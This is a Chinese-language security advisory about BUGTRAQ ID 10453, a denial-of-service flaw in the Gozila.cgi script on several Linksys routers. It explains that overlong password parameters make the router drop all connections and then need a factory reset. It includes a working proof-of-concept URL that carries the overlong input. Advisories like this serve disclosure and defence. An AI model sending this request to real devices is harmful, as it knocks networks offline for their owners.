信息提供：

漏洞類別：

攻擊類型：

發(fā)布日期：

更新日期：

受影響系統(tǒng)：

安全系統(tǒng)：

無(wú)

漏洞報(bào)告人：

漏洞描述：

BUGTRAQ  ID: 10453
Linksys擁有多種網(wǎng)絡(luò)設(shè)備產(chǎn)品線。
多種Linksys路由器包含的Gozila.cgi腳本未能正確處理用戶提交的參數(shù)，遠(yuǎn)程攻擊者可以利用這個(gè)漏洞對(duì)設(shè)備進(jìn)行拒絕服務(wù)攻擊。
如果提交2條超長(zhǎng)字符串給Gozila.cgi腳本的sysPasswd和sysPasswdConfirm參數(shù)，會(huì)導(dǎo)致路由器丟棄所有當(dāng)前連接，需要使用reset按鈕來(lái)恢復(fù)出廠設(shè)置。
攻擊者可以構(gòu)建WEB頁(yè)或發(fā)送惡意HTML形式EMAIL給目標(biāo)用戶。

測(cè)試方法：

http://192.168.1.1/Gozila.cgi?sysPasswd=AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&sysPasswdConfirm=AAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAA&UPnP_Work=1&FactoryDefaults=0

解決方法：

目前廠商還沒(méi)有提供補(bǔ)丁或者升級(jí)程序，我們建議使用此軟件的用戶隨時(shí)關(guān)注廠商的主頁(yè)以獲取最新版本：
http://www.linksys.com